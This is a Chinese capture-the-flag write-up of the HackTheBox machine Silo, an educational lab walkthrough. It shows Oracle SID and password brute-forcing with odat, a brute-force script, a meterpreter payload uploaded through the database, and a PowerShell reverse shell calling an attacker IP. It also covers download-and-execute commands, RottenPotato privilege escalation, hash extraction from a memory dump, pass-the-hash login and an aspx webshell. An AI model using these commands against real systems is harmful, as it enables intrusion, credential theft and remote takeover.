标签:HTB Windows bytes tcp 10.82 RPC 10.10 靶机
这台机器涉及到了oracle数据库,之前完全没有涉猎过,借此机会也是熟悉了一下这个数据库的操作方法;以及涉及到了关于内存取证方面的知识,正好上一次在美亚杯只是粗浅的学习了一下取证大师,则此也是借此机会好好的学习了一下取证相关知识
勘探
nmap -sC -sV 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-09 13:15 CST
Nmap scan report for 10.10.10.82
Host is up (0.073s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-09T05:17:36
|_ start_date: 2021-02-09T03:07:49
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.90 seconds
可以看出来80端口开了iis8.5,搜索一下没有可以利用的漏洞,应该是个兔子洞
135,和五位数都是rpc没有可以利用漏洞
rpcclient -U '' 10.10.10.82
Enter WORKGROUP\'s password:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE139和445可以看出对方系统的,并且共享文件夹中也没有东西
$smbclient -L //$ip/
Enter WORKGROUP\chris's password:
session setup failed: NT_STATUS_ACCESS_DENIED
┌─[root@kali]─[~]
└──╼ $smbmap -H $ip
[!] 445 not open on 10.10.10.82....1521是oracle-tns Oracle TNS listener这个是一个Oracle数据库的监听端口,有一个可以利用的漏洞
获取system权限
方法一
这种方法不需要获取www权限
首先安装odat,直接在kali中打odat然后就会自动开始安装
然后开始利用
~ odat sidguesser -s 10.10.10.82
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue... ########## | ETA: 00:00:01
[+] 'XEXDB' is a valid SID. Continue...
100% |#######################################################| Time: 00:02:22
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |#######################################################| Time: 00:00:05
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue... #### | ETA: 00:00:15
100% |#######################################################| Time: 00:02:22
[+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB发现了两个可用的sid,经过试验可用的是XE
同样这一步可以使用msf来对sid进行猜测
use scanner/oracle/sid_enum记得换一个大一点的字典
”/usr/share/metasploit-framework/data/wordlists/sid.txt“
用户密码爆破
然后爆破用户名密码:
➜ ~ sudo odat passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file /usr/share/odat/accounts/accounts_small.txt
[+] Valid credentials found: scott/tiger. Continue... 然后我还看到了一种odat其他的用法
过后我会在研究odat的文章中再详细学习和解释
odat all -s 10.10.10.82 -p 1521 -d XE
--snipped--
+] Valid credentials found: scott/tiger. Continue...
--snipped--还有一个0xdf大佬自己编写的爆破密码的脚本HTB: Silo | 0xdf hacks stuff
#!/usr/bin/env python
import cx_Oracle
import sys
from multiprocessing import Pool
MAX_PROC = 50
host = "10.10.10.82"
sid = "XE"
def usage():
print("{} [ip] [wordlist]".format(sys.argv[0]))
print(" wordlist should be of the format [username]:[password]")
sys.exit(1)
def scan(userpass):
u, p = userpass.split(':')[:2]
try:
conn = cx_Oracle.connect('{user}/{pass_}@{ip}/{sid}'.format(user=u, pass_=p, ip=host, sid=sid))
return u, p, True
except cx_Oracle.DatabaseError:
return u, p, False
def main(host, userpassfile, nprocs=MAX_PROC):
with open(userpassfile, 'r') as f:
userpass = f.read().rstrip().replace('\r','').split('\n')
pool = Pool(processes=nprocs)
for username, pass_, status in pool.imap_unordered(scan, [up for up in userpass]):
if status:
print("Found {} / {}\n\n".format(username, pass_))
else:
sys.stdout.write("\r {}/{} ".format(username, pass_))
if __name__ == '__main__':
if len(sys.argv) != 3:
usage()
main(sys.argv[1], sys.argv[2])数据库里没什么东西,这里用的是上传恶意文件执行:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.5 lport=4445 -f exe > 1.exe
odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ 1.exe ~/1.exe
odat externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ 1.exe执行脚本前记得用msf打开监听
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.16.7
lhost => 10.10.16.7
msf6 exploit(multi/handler) > set lport 4445
lport => 4445
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.7:4445
[*] Sending stage (200262 bytes) to 10.10.10.82
[*] Meterpreter session 1 opened (10.10.16.7:4445 -> 10.10.10.82:49167) at 2022-01-05 14:24:14 +0800就行了
方法二
用odat直接读取文件
odat ctxsys -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --getFile c:\\users\\administrator\\desktop\\root.txt
[1] (10.10.10.82:1521): Read the c:\users\administrator\desktop\root.txt file on the 10.10.10.82 server
[+] Data stored in the c:\users\administrator\desktop\root.txt file (escape char replace by '\n'):
82FDAB14799E467FCE23979F9C1BF92C方法三
感谢0xdf的思路
当我们在一个普通权限下通过whoami /priv发现SeImpersonatePrivilege证明我们可以使用RottenPotato提权
PS C:\windows\system32\inetsrv>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled我们下载MSFRottenPotato.exeGitHub - decoder-it/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITYSYSTEM.
然后编译一个bat文件
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.14',8085); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ ;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}; $client.Close()"然后下载
PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/rev.bat', 'C:\temp\rev.bat')
PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/MSFRottenPotato.exe', 'C:\temp\lp.exe')之后运行脚本
PS C:\temp> c:\temp\lp.exe * \temp\rev.bat
connect sock
CreateIlok: 0 0
start RPC connection
CreateDoc: 0 0
COM -> bytes received: 116
RPC -> bytes Sent: 116
RPC -> bytes received: 84
COM -> bytes sent: 84
COM -> bytes received: 24
RPC -> bytes Sent: 24
RPC -> bytes received: 132
COM -> bytes sent: 132
COM -> bytes received: 127
RPC -> bytes Sent: 127
RPC -> bytes received: 196
COM -> bytes sent: 196
COM -> bytes received: 243
RPC -> bytes Sent: 243
RPC -> bytes received: 192
COM -> bytes sent: 192
COM -> bytes received: 72
RPC -> bytes Sent: 72
RPC -> bytes received: 60
COM -> bytes sent: 60
COM -> bytes received: 42
RPC -> bytes Sent: 42
RPC -> bytes received: 56
COM -> bytes sent: 56
CoGet: -2147022986 0
[+] authresult != -1
[+] Elevated Token tye:2
[+] DuplicateTokenEx :1 0
[+] Duped Token type:1
[+] Running \temp\rev.bat sessionId 1
[+] CreateProcessWithTokenW OK
Auth result: 0
Return code: 0
Last error: 0记得打开nc监听
root@kali:~/hackthebox/silo-10.10.10.82# nc -lnvp 8085
listening on [any] 8085 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.82] 49181
PS C:\Windows\system32> whoami
nt authority\system方法四
在用户的桌面上我们会发现不止有flag还有一个issue.txt文件
dir \users\Phineas\Desktop
Directory: C:\users\Phineas\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 1/5/2018 10:56 PM 300 Oracle issue.txt
-a--- 1/4/2018 9:41 PM 32 user.txt
打开后发现文件中写了,内存备份文件存放在网盘里,密码也有
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):
Dropbox link provided to vendor (and password under separate cover).
Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0
link password:
£%Hm8646uC$那么下载下来用volatility来尝试内存取证
volatility kdbgscan -f SILO-20180105-221806.dmp
**************************************************
Instantiating KDBG using: Unnamed AS Win2012R2x64_18340 (6.3.9601 64bit)
Offset (V) : 0xf80078520a30
Offset (P) : 0x2320a30
KdCopyDataBlock (V) : 0xf8007845f9b0
Block encoded : Yes
Wait never : 0xd08e8400bd4a143a
Wait always : 0x17a949efd11db80
KDBG owner tag check : True
Profile suggestion (KDBGHeader): Win2012R2x64_18340
Version64 : 0xf80078520d90 (Major: 15, Minor: 9600)
Service Pack (CmNtCSDVersion) : 0
Build string (NtBuildLab) : 9600.16384.amd64fre.winblue_rtm.
PsActiveProcessHead : 0xfffff80078537700 (51 processes)
PsLoadedModuleList : 0xfffff800785519b0 (148 modules)
KernelBase : 0xfffff8007828a000 (Matches MZ: True)
Major (OptionalHeader) : 6
Minor (OptionalHeader) : 3
KPCR : 0xfffff8007857b000 (CPU 0)
KPCR : 0xffffd000207e8000 (CPU 1)
**************************************************
...之后尝试获得账号的hash
volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hivelist
Volatility Foundation Volatility Framework 2.6
Virtual Physical Name
------------------ ------------------ ----
0xffffc0000100a000 0x000000000d40e000 \??\C:\Users\Administrator\AppData\Local\Microsoft\Windows\UsrClass.dat
0xffffc000011fb000 0x0000000034570000 \SystemRoot\System32\config\DRIVERS
0xffffc00001600000 0x000000003327b000 \??\C:\Windows\AppCompat\Programs\Amcache.hve
0xffffc0000001e000 0x0000000000b65000 [no name]
0xffffc00000028000 0x0000000000a70000 \REGISTRY\MACHINE\SYSTEM
0xffffc00000052000 0x000000001a25b000 \REGISTRY\MACHINE\HARDWARE
0xffffc000004de000 0x0000000024cf8000 \Device\HarddiskVolume1\Boot\BCD
0xffffc00000103000 0x000000003205d000 \SystemRoot\System32\Config\SOFTWARE
0xffffc00002c43000 0x0000000028ecb000 \SystemRoot\System32\Config\DEFAULT
0xffffc000061a3000 0x0000000027532000 \SystemRoot\System32\Config\SECURITY
0xffffc00000619000 0x0000000026cc5000 \SystemRoot\System32\Config\SAM
0xffffc0000060d000 0x0000000026c93000 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xffffc000006cf000 0x000000002688f000 \SystemRoot\System32\Config\BBI
0xffffc000007e7000 0x00000000259a8000 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xffffc00000fed000 0x000000000d67f000 \??\C:\Users\Administrator\ntuser.dat
root@kali:~/hackthebox/silo-10.10.10.82# volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::最后尝试用psexec用hash登录
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 -target-ip 10.10.10.82
administrator@10.10.10.82
Impacket v0.9.16-dev - Copyright 2002-2018 Core Security Technologies
[*] Requesting shares on 10.10.10.82.....
[*] Found writable share ADMIN$
[*] Uploading file XryxqKFr.exe
[*] Opening SVCManager on 10.10.10.82.....
[*] Creating service PAYb on 10.10.10.82.....
[*] Starting service PAYb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system后渗透
这里因为我由于直接利用了odat脚本,所以在渗透过程中甚至拿到了数据库的账号密码也没有登进去看看,这里在整理笔记的时候看看别人的思路整理了一份,登录数据库的步骤(我的机器里甚至没有安装oracle,后期在安装数据库的时候真的是特别痛苦)
数据库探查
在HTB: Silo - PurpleRabbit这篇文章中,讲解了,不需要安装oracle数据库,只需要使用sqlplus就可以登陆进去的方法,我这里先写一下它的方法
sqlplus scott/tiger@$10.10.10.84:1521/XE
SQL> select table_name from user_tables;
TABLE_NAME
------------------------------
DEPT
EMP
BONUS
SALGRADE
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO发现他数据库里没什么东西
获取www权限
思路来源于0xdf
通过
root@kali:~/hackthebox/silo-10.10.10.82# odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\\inetpub\\wwwroot 0xdf.aspx /usr/share/webshells/aspx/cmdasp.aspx
[1] (10.10.10.82:1521): Put the /usr/share/webshells/aspx/cmdasp.aspx local file in the C:\inetpub\wwwroot path (named 0xdf.aspx) of the 10.10.10.82 server
[+] The /usr/share/webshells/aspx/cmdasp.aspx local file was put in the remote C:\inetpub\wwwroot path (named 0xdf.aspx)上传一个web命令执行脚本,然后通过之前的iis8.5来执行
然后我们通过这个命令行来远程下载我们的shell转发脚本
在本地打开web服务
python -m SimpleHTTPServer 80
然后在命令行
powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.15.48:80/Invoke-PowerShellTcp.ps1')获得一个转发shell
标签:HTB,Windows,bytes,tcp,10.82,RPC,10.10,靶机 来源: https://blog.csdn.net/m0_57221101/article/details/122722260
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。